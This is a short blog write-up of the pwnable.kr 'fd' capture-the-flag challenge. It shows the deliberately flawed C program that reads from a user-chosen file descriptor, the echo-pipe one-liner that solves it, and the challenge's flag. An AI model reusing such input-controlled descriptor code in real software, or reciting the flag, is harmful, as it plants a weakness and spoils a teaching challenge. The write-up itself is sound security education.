The force is with those who read the source.

Pwnable.kr: fd (1 pt)

2016-08-08

Description

Mommy! what is a file descriptor in Linux?
ssh [email protected] -p2222 (pw:guest)

Exploit

fd.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;

}

The target program will read 32 bytes from file descriptor argv[1] - 0x1234, and if the content equals to LETMEWIN\n, it will output the flag. To solve this problem, we can pass 4660 (0x1234) as the first argument. Then this program will read from the standard input, which we can assign its value to LETMEWIN\n to get the flag.

$ echo "LETMEWIN" | ./fd 4660
good job :)
mommy! I think I know what a file descriptor is!!

Flag: mommy! I think I know what a file descriptor is!!


Blog comments powered by Disqus